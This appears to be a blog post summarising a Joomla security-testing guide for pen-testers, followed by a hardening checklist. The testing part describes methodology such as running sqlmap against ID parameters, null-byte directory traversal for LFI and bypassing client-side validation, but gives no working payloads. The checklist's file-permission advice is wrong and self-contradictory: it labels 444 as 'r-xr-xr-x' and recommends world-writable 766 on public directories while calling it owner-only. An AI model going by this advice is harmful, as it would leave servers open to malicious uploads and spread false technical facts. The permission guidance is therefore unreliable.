Joomla is one of the most popular CMS which gives ease of installation, handling and managing your web application. And so being obvious is used in many popular sites and therefore security of Joomla is of great importance in order to keep the web application secure. However Joomla being an open source project easily clears the basic vulnerabilities exam, although there are certainly some security risks which a pen-tester must not forget while testing such application. Such risks can be classified as:
- Vulnerabilities in third party components.
- Insecure custom development of certain features such as order booking, payment integration etc.
- Misconfiguration related vulnerabilities, and
- Vulnerabilities in Joomla Core (might need in depth testing of the core, however)
In my whitepaper, “Fast And Furious Joomla Security Testing Guide”, I have described a comprehensive approach to pen-test Joomla applications. I believe, it should be of great value to both pen-testers and developers.
Current Security State of Joomla:
When we talk about Security in Joomla, we have to focus on both Joomla framework and the extensions too. However Joomla itself is quite stable and less prone to attacks. As of now there are less number of vulnerabilities being discovered in Joomla core, however in early days of this project, lot of vulnerabilities had been discovered in its core which includes XSS, SQL Injections, Privilege Escalations, Code Injections, etc. So this makes it very clear that chances of hitting a vulnerability in a Joomla extensions is much higher than finding a zero day in the core.
Most Common vulnerabilities found in Joomla:
With Code Injection on the top followed by SQL Injection, Joomla core has been reported a total of 55 Injection Flaws, 16 Cross Site Scripting, 14 File Inclusions, 6 Information Disclosures, 3 Privilege Escalations, 2 CSRF, 1 HTTP Response Splitting and 2 Access Control Bypass vulnerabilities.
Need for this Document:
This documentation has been made to reveal the methodology which must be adopted (not strictly) to test a Web Application powered by Joomla. This guide will also help you recommend security countermeasures to your clients for bulletproofing their Joomla sites.
Detecting Joomla: Well, for detecting a Joomla site, one can start with manual approach by hitting a known Joomla path or digging into the source code of site. However, automated tools like Joomscan, CMS-explorer, etc. might also be used for this purpose. Also try to find the version of the installation, so that If older version has been implemented, you can Google out the previously known bugs which have been awarded CVEs. Automated tools also try to the same stuff by finding the version and listing down the known bugs for that particular version. However admin might have done some changes in order to escape from scanners, so manual approach must be tried positively.
1. Find the version (as mentioned in above point). If the installation is not the latest one, there are chances of already disclosed bugs. Google out such information and try to regenerate the previously known bugs discovered by other researchers.
2. List down the plugins being used. Find as many input points and try injecting malicious data. As exploiting the core of Joomla will require more intense manual test, and your client is short of time, a time saving approach will be to dig the source code, find the third party extensions and try to locate the already known vulnerabilities in extensions.
3. Core as a target: As already mentioned, Joomla core is quite secure and finding a bug in core will need a more planned and intense testing. For this spider the application, find all the injection points, and try malicious input in each injection point. There might be client side validation at many points which can be bypassed by using any intercepting proxy like BurpSuite, Tamper Data, etc. Meanwhile you can try the same approach for testing plugins.
Automated Tools: These tools like CMS-explorer and Joomscan comes up with predefined test case which they generate according to the application. They identify vulnerabilities mainly on the basis of the detected version of core and plugins. However one advantage they give over manual testing is, they test insecure configurations on the server in a pretty fast manner.
SQL Injection: Joomla extensions have been reported a lot of SQL Injection flaws in core as well as plugins. So loading your kit with sqlmap will not be a bad idea. Make sure you try SQL injection as soon as you see some ID, catid, and other such parameter passing by.
Testing for LFI: Also, there have been quite a good number of LFI exploits in Joomla extensions and core, so wherever you see some page or a path going through a parameter, do not forget to inject the null bytes for directory traversal to internal files that may reveal critical information.
Testing for other vulnerabilities: Do not forget to test for Command Injection, LFI, RFI, CSRF, Privilege Escalation, Information Disclosure, and other such flaws. As Web App Sec is a huge field and there are a huge number of vulnerabilities being exploited in the wild. Make sure you are aware of those tests meanwhile trying to find a vulnerable extension to save your time. Another point which must be kept in mind is that while browsing application, you might not be able to reach every possible file that may be vulnerable. This can be down by either using Spider on the web application of getting a copy of the plugin explicitly in order to find all possible paths. If time allows, you can also do some source code review given that you have some web programming language.
Securing Joomla: Always keep your application updated, whether it isJoomla or your copy of Windows. There are zero days of which you are not aware, but specific vendors are and hence they release updates too. Keep track of your target visitors, use strong passwords and self-test your application time to time. You must also follow security practices which Joomla people mention in their Joomla Security Checklist. You can have look on the following points as well:
- Always keep you Joomla up to date. Install the latest upgrade as soon as the upgrade is released.
- Whatever extensions are being used, they must be properly patched with latest upgrade releases. Any old extension may give attacker a way to compromise the site.
- Do not use extensions which have not being used by, or which have not been tested properly.
- All user inputs must be properly validated. These inputs can be inputs in forms, URI, image uploads, etc. Suppose if a BROWSE button enables the user to upload the image, it must only enable him to upload an image and not a PHP shell which may later work like a backdoor on the server.
- Use strong passwords for all logins. At least 8 characters, one special character, one number, and one case sensitive letter. It will protect your installation from a brute force.
- Always keep a track of “Latest Visitors” in the Web Server’s log files for catching potential attacks. Never consider your log files as just a piece of information. It is highly useful in tracking and monitoring the users.
- Put some stress to implement more security to the whole server on which you Joomla based site is hosted; being it hosted on shared server or a dedicated one.
- Make a list of all the extensions you use and keep monitoring them.
- Keep yourself up to date with latest vulnerabilities and disclosures at various security advisories. Exploit-db, osvdb, CVE, etc. are some of the good resources.
- Change the permission on your .htaccess file as it is by default using write permissions (as Joomla has to update it). The best practice is to use 444 (r-xr-xr-x).
- Proper file permissions on the public directories must be given so that any malicious file must not be uploaded or executed. The best practice in this context is 766 (rwxrw-rw-), i.e. only owner can read, write and execute. Others can only read and write.
- No one must have the permission to write into PHP files on the server. They all must be set with 444 (r—r—r–), everyone can read only.
- Delegate the roles. It makes your Administrator account safe. In case someone hacks into your machine, it must have access to the respective user only, and not the administrator account.
- The database users must only have permission to give commands like INSERT, UPDATE, and DELETE rows. They must not be allowed to DROP tables.
- Change the names of backend folders, e.g. you can change /administrator to /admin12345.
- Last but not the least, keep updated with latest vulnerabilities.